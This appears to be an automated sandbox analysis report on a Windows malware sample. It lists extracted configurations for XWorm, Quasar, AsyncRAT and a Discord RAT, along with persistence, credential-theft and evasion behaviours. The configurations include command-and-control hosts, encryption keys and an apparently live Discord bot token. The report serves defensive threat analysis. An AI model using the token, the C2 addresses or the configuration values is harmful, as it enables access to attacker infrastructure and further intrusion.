asyncrat | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

08-01-2025 13:31

250108-qsdnes1qb1 10

17-12-2024 13:35

15-11-2024 19:06

14-11-2024 23:35

14-11-2024 23:26

14-11-2024 23:12

Analysis

max time kernel
900s
max time network
901s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08-01-2025 13:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

xworm

Version

3.1

profile-indians.gl.at.ply.gg:39017

Attributes

Install_directory
%AppData%
install_file
USB.exe

Extracted

Family

discordrat

Attributes

discord_token
MTMxNTQxMDg0NDg3NTQ4OTI4MA.Gx5ptK.HY1OYsjGMP1MsOoyD2E7T9pCvkfHTdOPozmb_c
server_id
1315411300192616569

Extracted

Family

quasar

Version

1.4.1

Botnet

Stinky

ef3243fsert34.ddns.net:47820

anthonyngati.ddns.net:3872

Mutex

60cba0a9-0a63-450c-9567-57ef0e3c2e24

Attributes

encryption_key
7A23123B6E1E0CCDB27477C6C7654C7BE2FEDE54
install_name
sru.exe
log_directory
Logs
reconnect_delay
3000
startup_key
xml
subdirectory
sru

Extracted

Family

quasar

Version

1.4.1

Botnet

Nigga

yzs-42879.portmap.host:42879

Mutex

57d72303-b5e9-46aa-8cc4-9690809c1a9e

Attributes

encryption_key
F1EBDB1862062F9265C0B5AC4D02C76D026534D0
install_name
RuntimeBroker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
Temp

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

3.70.228.168:555

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Windows Client

148.163.102.170:4782

Mutex

4c18e02c-7c39-4a5e-bbef-16fe13828101

Attributes

encryption_key
73B0A3AC50C78E243EA93BF9E60C9BC63D63CA26
install_name
Sever Startup.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Startup
subdirectory
Windows Startup

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office

85.192.29.60:5173

Mutex

QAPB6w0UbYXMvQdKRF

Attributes

encryption_key
pxC3g4rfVijQxK1hMGwM
install_name
csrss.exe
log_directory
Logs
reconnect_delay
3000
startup_key
NET framework
subdirectory
SubDir

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001b00000002aba9-113.dat	family_xworm
behavioral1/memory/2980-135-0x0000000000320000-0x0000000000334000-memory.dmp	family_xworm

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Discordrat family
discordrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 48 IoCs

resource	yara_rule
behavioral1/files/0x0004000000000691-1189.dat	family_quasar
behavioral1/memory/3172-1216-0x00000000004F0000-0x0000000000814000-memory.dmp	family_quasar
behavioral1/files/0x000600000000f4c6-1221.dat	family_quasar
behavioral1/memory/3504-1242-0x0000000000030000-0x0000000000354000-memory.dmp	family_quasar
behavioral1/memory/1412-1323-0x0000000000740000-0x0000000000A64000-memory.dmp	family_quasar
behavioral1/memory/4712-1326-0x0000000000300000-0x0000000000624000-memory.dmp	family_quasar
behavioral1/memory/704-1538-0x0000000000D20000-0x0000000001044000-memory.dmp	family_quasar
behavioral1/memory/828-1560-0x0000000000570000-0x0000000000894000-memory.dmp	family_quasar
behavioral1/memory/4200-1754-0x0000000000500000-0x0000000000824000-memory.dmp	family_quasar
behavioral1/memory/900-1777-0x0000000000700000-0x0000000000A24000-memory.dmp	family_quasar
behavioral1/memory/4200-1991-0x0000000000C70000-0x0000000000F94000-memory.dmp	family_quasar
behavioral1/memory/1332-2015-0x0000000000390000-0x00000000006B4000-memory.dmp	family_quasar
behavioral1/memory/3240-2241-0x0000000000490000-0x00000000007B4000-memory.dmp	family_quasar
behavioral1/memory/4896-2246-0x0000000000140000-0x0000000000464000-memory.dmp	family_quasar
behavioral1/memory/1616-2425-0x0000000000680000-0x00000000009A4000-memory.dmp	family_quasar
behavioral1/memory/2216-2429-0x0000000000B40000-0x0000000000E64000-memory.dmp	family_quasar
behavioral1/memory/4408-2648-0x0000000000730000-0x0000000000A54000-memory.dmp	family_quasar
behavioral1/memory/1860-2684-0x0000000000CF0000-0x0000000001014000-memory.dmp	family_quasar
behavioral1/memory/3132-3212-0x0000000000400000-0x0000000000724000-memory.dmp	family_quasar
behavioral1/memory/2796-3356-0x00000000009D0000-0x0000000000CF4000-memory.dmp	family_quasar
behavioral1/memory/772-3372-0x0000000000C70000-0x0000000000F94000-memory.dmp	family_quasar
behavioral1/memory/1008-4205-0x0000000000E50000-0x0000000001174000-memory.dmp	family_quasar
behavioral1/memory/2160-4904-0x0000000000FB0000-0x00000000012D4000-memory.dmp	family_quasar
behavioral1/memory/3176-5333-0x0000000000CE0000-0x0000000001004000-memory.dmp	family_quasar
behavioral1/memory/2412-6138-0x0000000000610000-0x0000000000934000-memory.dmp	family_quasar
behavioral1/memory/2264-7119-0x0000000000CB0000-0x0000000000FD4000-memory.dmp	family_quasar
behavioral1/memory/4628-7247-0x0000000000B20000-0x0000000000E44000-memory.dmp	family_quasar
behavioral1/memory/3220-7367-0x0000000000DC0000-0x00000000010E4000-memory.dmp	family_quasar
behavioral1/memory/3916-7625-0x0000000000B70000-0x0000000000E94000-memory.dmp	family_quasar
behavioral1/memory/3136-7869-0x0000000000DB0000-0x00000000010D4000-memory.dmp	family_quasar
behavioral1/memory/852-7885-0x00000000001A0000-0x00000000004C4000-memory.dmp	family_quasar
behavioral1/memory/3120-8710-0x0000000000FF0000-0x0000000001314000-memory.dmp	family_quasar
behavioral1/memory/1804-9113-0x0000000000EB0000-0x00000000011D4000-memory.dmp	family_quasar
behavioral1/memory/3100-10102-0x0000000000490000-0x00000000007B4000-memory.dmp	family_quasar
behavioral1/memory/1460-10197-0x00000000005F0000-0x0000000000914000-memory.dmp	family_quasar
behavioral1/memory/1396-10211-0x0000000000550000-0x0000000000874000-memory.dmp	family_quasar
behavioral1/memory/2796-10439-0x0000000000180000-0x00000000004A4000-memory.dmp	family_quasar
behavioral1/memory/4692-10695-0x0000000000A20000-0x0000000000D44000-memory.dmp	family_quasar
behavioral1/memory/3136-11424-0x0000000000520000-0x0000000000844000-memory.dmp	family_quasar
behavioral1/memory/2256-11667-0x0000000000DF0000-0x0000000001114000-memory.dmp	family_quasar
behavioral1/files/0x0005000000025cbf-11701.dat	family_quasar
behavioral1/memory/3480-11750-0x00000000001D0000-0x00000000004F4000-memory.dmp	family_quasar
behavioral1/files/0x0003000000025cc3-11788.dat	family_quasar
behavioral1/memory/1184-11802-0x0000000000640000-0x000000000068E000-memory.dmp	family_quasar
behavioral1/memory/3580-11848-0x0000000000CB0000-0x0000000000FD4000-memory.dmp	family_quasar
behavioral1/memory/1652-11981-0x0000000000460000-0x0000000000784000-memory.dmp	family_quasar
behavioral1/memory/4768-12274-0x0000000000710000-0x0000000000A34000-memory.dmp	family_quasar
behavioral1/memory/2488-12288-0x00000000000F0000-0x0000000000414000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3712 created 632	3712	powershell.EXE	5

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2492	powershell.exe
5048	powershell.exe
3712	powershell.EXE

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1412	netsh.exe
4716	netsh.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2112	chrome.exe
656	chrome.exe
564	msedge.exe
5040	msedge.exe
4712	msedge.exe
3932	msedge.exe
2056	chrome.exe
2240	chrome.exe
4304	msedge.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ec1d783eda90ea4f1a73218af4fd58aa.exe	dlscord.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ec1d783eda90ea4f1a73218af4fd58aa.exe	dlscord.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	Bloxflip%20Predictor.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	Process not Found
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a87b5397a2736773782f50e108b2da4.exe	conhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a87b5397a2736773782f50e108b2da4.exe	conhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	Process not Found
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	Process not Found

Executes dropped EXE 64 IoCs

pid	Process
2640	Security.exe
2980	$77Security.exe
3140	Install.exe
4012	$77Security.exe
4596	client.exe
2480	444.exe
2088	conhost.exe
1860	cli.exe
2752	$77Security.exe
3504	RuntimeBroker.exe
4712	RuntimeBroker.exe
1412	sru.exe
704	sru.exe
828	RuntimeBroker.exe
2032	cnct.exe
4200	sru.exe
900	RuntimeBroker.exe
2516	dlscord.exe
4200	sru.exe
1332	RuntimeBroker.exe
3240	sru.exe
4896	RuntimeBroker.exe
1616	RuntimeBroker.exe
2216	sru.exe
5028	$77Security.exe
4408	RuntimeBroker.exe
1860	sru.exe
3320	RuntimeBroker.exe
3968	sru.exe
408	Kerish_Doctor_2017.exe
2216	RuntimeBroker.exe
1988	Kerish_Doctor_2017.tmp
3700	sru.exe
4720	RuntimeBroker.exe
3804	sru.exe
3132	RuntimeBroker.exe
2112	sru.exe
920	$77Security.exe
2796	RuntimeBroker.exe
772	sru.exe
4940	RuntimeBroker.exe
4048	sru.exe
2872	sru.exe
2896	RuntimeBroker.exe
3176	RuntimeBroker.exe
4720	sru.exe
2180	RuntimeBroker.exe
1464	sru.exe
2856	RuntimeBroker.exe
4808	sru.exe
4492	Tutorial.exe
4672	PsExec64.exe
3168	$77Security.exe
1008	RuntimeBroker.exe
3384	sru.exe
3528	RuntimeBroker.exe
1880	sru.exe
4084	RuntimeBroker.exe
224	sru.exe
3132	main1.exe
3452	XClient.exe
2648	RuntimeBroker.exe
2160	sru.exe
1740	RuntimeBroker.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx	svchost.exe

Loads dropped DLL 44 IoCs

pid	Process
3172	Client-built.exe
1988	Kerish_Doctor_2017.tmp
1988	Kerish_Doctor_2017.tmp
3476	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe
3132	main1.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Security = "C:\\Users\\Admin\\AppData\\Roaming\\$77Security.exe"	$77Security.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ec1d783eda90ea4f1a73218af4fd58aa = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dlscord.exe\" .."	dlscord.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	CrSpoof.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\4a87b5397a2736773782f50e108b2da4 = "\"C:\\Users\\Admin\\AppData\\Roaming\\conhost.exe\" .."	conhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\4a87b5397a2736773782f50e108b2da4 = "\"C:\\Users\\Admin\\AppData\\Roaming\\conhost.exe\" .."	conhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\ec1d783eda90ea4f1a73218af4fd58aa = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dlscord.exe\" .."	dlscord.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Windows\\Bloxflip Predictor.exe"	Bloxflip%20Predictor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Process not Found

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
271	discord.com
1	raw.githubusercontent.com
20	raw.githubusercontent.com
65	raw.githubusercontent.com
68	raw.githubusercontent.com
254	raw.githubusercontent.com
255	raw.githubusercontent.com
270	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
86	ip-api.com
260	ip-api.com

Drops autorun.inf file 1 TTPs 8 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	D:\autorun.inf	dlscord.exe
File created	F:\autorun.inf	dlscord.exe
File created	C:\autorun.inf	conhost.exe
File opened for modification	C:\autorun.inf	conhost.exe
File created	D:\autorun.inf	conhost.exe
File created	F:\autorun.inf	conhost.exe
File opened for modification	F:\autorun.inf	conhost.exe
File created	C:\autorun.inf	dlscord.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	Process not Found
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\System32\Tasks\Windows Startup	svchost.exe
File opened for modification	C:\Windows\system32\sru	Client-built.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	Process not Found
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File created	C:\Windows\system32\sru\sru.exe	Client-built.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru\sru.exe	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe
File opened for modification	C:\Windows\system32\sru	sru.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3712 set thread context of 1540	3712	powershell.EXE	102
PID 4492 set thread context of 4820	4492	Tutorial.exe	332

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\Bloxflip Predictor.exe	Bloxflip%20Predictor.exe
File opened for modification	C:\Windows\Bloxflip Predictor.exe	Process not Found

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000e000000025bf7-4475.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cnct.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Kerish_Doctor_2017.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tutorial.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	444.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	conhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cli.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dlscord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regbrowsers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Kerish_Doctor_2017.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bloxflip%20Predictor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1224	PING.EXE
2920	PING.EXE
4492	PING.EXE
1656	PING.EXE
4200	PING.EXE
3700	PING.EXE
4612	PING.EXE
4332	PING.EXE
4808	PING.EXE
3784	PING.EXE
1448	Process not Found
5028	PING.EXE
1600	PING.EXE
4020	PING.EXE
872	PING.EXE
4452	PING.EXE
4540	PING.EXE
3984	PING.EXE
1768	PING.EXE
5012	PING.EXE
1396	PING.EXE
2440	PING.EXE
4304	PING.EXE
3616	PING.EXE
3228	PING.EXE
4184	PING.EXE
1056	PING.EXE
764	PING.EXE
1012	PING.EXE
2032	PING.EXE
3800	PING.EXE
952	PING.EXE
1472	PING.EXE
4672	PING.EXE
2216	PING.EXE
992	PING.EXE
4816	PING.EXE
1972	PING.EXE
3528	PING.EXE
4536	PING.EXE
1064	PING.EXE
2260	PING.EXE
3664	PING.EXE
952	PING.EXE
1608	PING.EXE
3780	PING.EXE
5052	PING.EXE
1876	PING.EXE
1508	PING.EXE
2772	PING.EXE
1056	PING.EXE
1488	PING.EXE
5056	PING.EXE
3580	PING.EXE
4644	PING.EXE
232	PING.EXE
3496	PING.EXE
1880	Process not Found
4688	PING.EXE
956	PING.EXE
2100	PING.EXE
3112	Process not Found
652	PING.EXE
4020	PING.EXE

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3372	timeout.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4712	taskkill.exe
5004	taskkill.exe

Modifies data under HKEY_USERS 58 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
